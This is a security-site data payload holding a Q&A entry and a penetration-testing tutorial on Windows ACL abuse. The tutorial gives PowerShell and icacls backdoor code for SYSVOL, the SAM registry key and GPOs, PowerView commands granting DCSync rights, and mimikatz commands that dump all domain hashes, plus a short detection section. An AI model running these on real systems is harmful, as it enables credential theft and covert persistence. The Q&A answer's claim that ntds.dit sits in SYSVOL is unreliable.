[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9Ly0UjOj2M-eY4-63HGjEPgbWyRyGnNxbBvhpALvTS0":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},188,"How can a domain user read all user hashes by exploiting ACL on ntds.dit?","An attacker can modify the ACL of the `ntds.dit` file (or its share) in a domain controller's SYSVOL to grant read access to a regular domain user. Once the ACL is changed, the user can access and extract all domain password hashes. This domain ACL exploitation technique is explained in the [ACL article](\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows).","\u003Cp>An attacker can modify the ACL of the `ntds.dit` file (or its share) in a domain controller&#39;s SYSVOL to grant read access to a regular domain user. Once the ACL is changed, the user can access and extract all domain password hashes. This domain ACL exploitation technique is explained in the [ACL article](\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-access-control-list-in-windows\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-a-domain-user-read-all-user-hashes-by-exploiting-acl-on-ntdsdit-1777484831213","ntds.dit, domain penetration, ACL exploitation, hash extraction, SYSVOL",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},48,"Penetration Techniques - Access Control List in Windows","penetration-techniques-access-control-list-in-windows","Learn Windows ACL exploitation for penetration testing, including privilege escalation, backdoor techniques, and defensive detection using icacls and PowerShell.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>ACL (Access Control List) in Windows systems is used to represent a list of user (group) permissions.\u003C\u002Fp>\u003Cp>In penetration testing, understanding and utilizing ACL, especially in backdoor exploitation (privilege escalation), offers significant room for application.\u003C\u002Fp>\u003Cp>From a defensive perspective, if a system is compromised, finding and removing ACL backdoors left by attackers also requires a certain understanding of ACL.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>ACL-related concepts\u003C\u002Fli>\u003Cli>Viewing ACL\u003C\u002Fli>\u003Cli>ACL exploitation (files, registry, and domain environments)\u003C\u002Fli>\u003Cli>ACL detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 ACL-related concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FSecAuthZ\u002Faccess-control-lists\u003C\u002Fp>\u003Ch4>ACL:\u003C\u002Fh4>\u003Cp>Access Control List, a list used to represent user (group) permissions, including DACL and SACL\u003C\u002Fp>\u003Ch4>ACE:\u003C\u002Fh4>\u003Cp>Access Control Entry, an element within an ACL\u003C\u002Fp>\u003Ch4>DACL:\u003C\u002Fh4>\u003Cp>Discretionary Access Control List, a list used to represent permissions for a security object\u003C\u002Fp>\u003Ch4>SACL:\u003C\u002Fh4>\u003Cp>System Access Control List, used to log access to a security object\u003C\u002Fp>\u003Ch4>Intuitive understanding:\u003C\u002Fh4>\u003Cp>ACLs are used in the Windows access control model, such as permissions for files and registries, to indicate which users (groups) have operational permissions\u003C\u002Fp>\u003Cp>For example, when accessing a file, the system will make the following judgments:\u003C\u002Fp>\u003Cul>\u003Cli>If there is no DACL, the system will allow access\u003C\u002Fli>\u003Cli>If a DACL exists but has no ACEs, the system will deny all access\u003C\u002Fli>\u003Cli>If a DACL exists and ACEs are present, each ACE specifies either allow or deny permissions.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Example demonstration\u003C\u002Fh3>\u003Cp>For the folder C:\\Windows\\SYSVOL\\sysvol\\test.com, view folder properties\u003C\u002Fp>\u003Cp>By default, there are five DACLs, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019792499_0_b63f250865.jpeg\">\u003C\u002Fp>\u003Cp>Select one DACL, which contains multiple ACEs, indicating the permissions granted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019800895_1_a9db3ccfbf.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 ACLs in files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (icacls):\u003C\u002Fh3>\u003Ch4>1. View the ACL of a specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019814348_2_56d0ddb9c7.jpeg\">\u003C\u002Fp>\u003Ch4>2. Back up the ACL of a specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fsave AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Restore ACL for specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\ \u002Frestore AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When restoring, the path needs to be set to the parent directory\u003C\u002Fp>\u003Ch4>4. Add full access permissions for user test1 to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fgrant test1:(OI)(CI)(F) \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(OI) stands for Object Inherit\u003C\u002Fp>\u003Cp>(CI) stands for Container Inherit\u003C\u002Fp>\u003Cp>(F) stands for Full Access\u003C\u002Fp>\u003Ch4>5. Remove full access permissions for user test1 from specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fremove test1 \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>For example, C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'| Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Add full access permissions for user test1 to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Remove user test1's full access permissions to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to the specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    $file.fullname\u003Cbr>    Add-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove user test1's full access permissions to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    Remove-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. Local Privilege Escalation Backdoor\u003C\u002Fh4>\u003Cp>After obtaining administrator privileges on a Windows system, modify the ACL of system directories to grant full access to regular users, creating a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Subsequently, elevate from a regular user to administrator privileges through various methods such as DLL hijacking or file replacement.\u003C\u002Fp>\u003Ch4>2. Modification of GPO in Domain Environment\u003C\u002Fh4>\u003Cp>Modify the ACL of the domain shared folder \\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\ to grant full access to regular users.\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Subsequently, use the privileges of a regular domain user to modify the domain's GPO, alter scheduled tasks within the GPO, and achieve remote execution of scheduled tasks.\u003C\u002Fp>\u003Cp>For related methods, refer to the previous article 'Domain Penetration – Remote Execution via Scheduled Tasks in GPO'.\u003C\u002Fp>\u003Ch4>3. Domain ordinary user reads all user hashes within the domain\u003C\u002Fh4>\u003Cp>Create file sharing for ntds.dit, add ACL\u003C\u002Fp>\u003Cp>Subsequently, domain ordinary users can access the domain controller's ntds.dit file to read all user hashes within the domain\u003C\u002Fp>\u003Ch2>0x04 ACL in the Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>e.g., HKEY_LOCAL_MACHINE\\SAM\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'HKLM:\\SAM' | Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019825851_3_5509259ae4.jpeg\">\u003C\u002Fp>\u003Cp>Obtain specific content of the Access item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl -Path 'HKLM:\\SAM'\u003Cbr>$acl.Access\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019837440_4_cd1dbf9e34.jpeg\">\u003C\u002Fp>\u003Ch4>2. Grant user test1 full access to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\" indicates that subkeys inherit permissions from the current registry key\u003C\u002Fp>\u003Cp>Modifying the ACL of registry key HKLM:\\SAM requires Administrator privileges\u003C\u002Fp>\u003Cp>Modifying the ACL of the registry key HKLM:\\SAM\\SAM requires System privileges\u003C\u002Fp>\u003Ch4>3. Remove the full access permission of user test1 to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.RemoveAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation approach:\u003C\u002Fh3>\u003Ch4>1. Local privilege escalation backdoor\u003C\u002Fh4>\u003Cp>Modify the registry keys HKLM:\\SAM and HKLM:\\SYSTEM to add full access permissions for ordinary users\u003C\u002Fp>\u003Cp>Ordinary users can obtain the hashes of all local users through registry entries, thereby gaining administrator privileges\u003C\u002Fp>\u003Ch4>3. Local Auto-start Backdoor\u003C\u002Fh4>\u003Cp>Modify registry locations to add startup items or hijack entries\u003C\u002Fp>\u003Ch2>0x05 ACL in Domain Environment\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Implemented through Active Directory Service Interfaces (ADSI)\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fcontrolling-access-to-objects-in-active-directory-domain-services\u003C\u002Fp>\u003Cp>Reference for calling ADSI with PowerShell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002FForums\u002Fwindowsserver\u002Fen-US\u002Fdf3bfd33-c070-4a9c-be98-c4da6e591a0a\u002Fforum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerView has already implemented this part, so this section directly references the functionality in PowerView\u003C\u002Fp>\u003Cp>Code repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ch4>1. Obtain all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObject -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Obtain the ACLs of all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObjectAcl -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Obtain the ACL of a specified user\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainUser test1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. DCSync Backdoor\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is learned from: https:\u002F\u002Fwww.specterops.io\u002Fassets\u002Fresources\u002Fan_ace_up_the_sleeve.pdf\u003C\u002Fp>\u003Cp>DCSync is a feature of mimikatz that can simulate a domain controller and export account password hashes from the domain controller\u003C\u002Fp>\u003Cp>If we obtain domain administrator privileges on a host within the domain, we can use the following command to directly export the hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, only Domain Controllers and Enterprise Domain Admins have the permissions to use DCSync.\u003C\u002Fp>\u003Cp>However, we can add ACLs to DS-Replication-GetChanges (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), enabling ordinary users to invoke DCSync and export the hashes of all users in the domain.\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>The command to add the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, on a host within the domain where the test1 user is logged in, we can use the DCSync feature of mimikatz.\u003C\u002Fp>\u003Cp>The command to remove the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. GPO Backdoor\u003C\u002Fh4>\u003Cp>(1) View the GPOs in the current domain\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module GroupPolicy\u003Cbr>Get-GPO -All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below, TestGPO is one I added myself in the test environment, while Default Domain Policy and Default Domain Controllers Policy are GPOs that exist by default in the domain environment\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019858190_5_62de6f01db.jpeg\">\u003C\u002Fp>\u003Cp>(2) Add full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Remove full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Subsequent operations can be performed on GPOs to add scheduled tasks, enabling remote execution of scheduled tasks. For specific methods, refer to the previous article 'Domain Penetration - Utilizing Scheduled Tasks in GPOs for Remote Execution'.\u003C\u002Fp>\u003Ch2>0x06 ACL Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Files and Registry\u003C\u002Fh4>\u003Cp>Open-source tools such as WindowsDACLEnumProject can be utilized:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnccgroup\u002FWindowsDACLEnumProject\u003C\u002Fp>\u003Cp>Capable of listing risky ACLs.\u003C\u002Fp>\u003Ch4>3. Domain Environment\u003C\u002Fh4>\u003Cp>Advanced security audit policies need to be enabled. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fcanitpro\u002F2017\u002F03\u002F29\u002Fstep-by-step-enabling-advanced-security-audit-policy-via-ds-access\u002F\u003C\u002Fp>\u003Cp>After enabling the policy, Event ID 5136 will record ACL modifications in the domain environment. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.ultimatewindowssecurity.com\u002Fsecuritylog\u002Fencyclopedia\u002Fevent.aspx?eventid=5136\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces techniques for exploiting ACLs in Windows systems for backdoor purposes in file systems, registry, and domain environments, along with suggestions for detecting such backdoors.\u003C\u002Fp>\u003Cp>I have learned a lot about ACLs in domain environments from PowerView and would like to thank the author for open-sourcing it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>ACL (Access Control List) in Windows systems is used to represent a list of user (group) permissions.\u003C\u002Fp>\u003Cp>In penetration testing, understanding and utilizing ACL, especially in backdoor exploitation (privilege escalation), offers significant room for application.\u003C\u002Fp>\u003Cp>From a 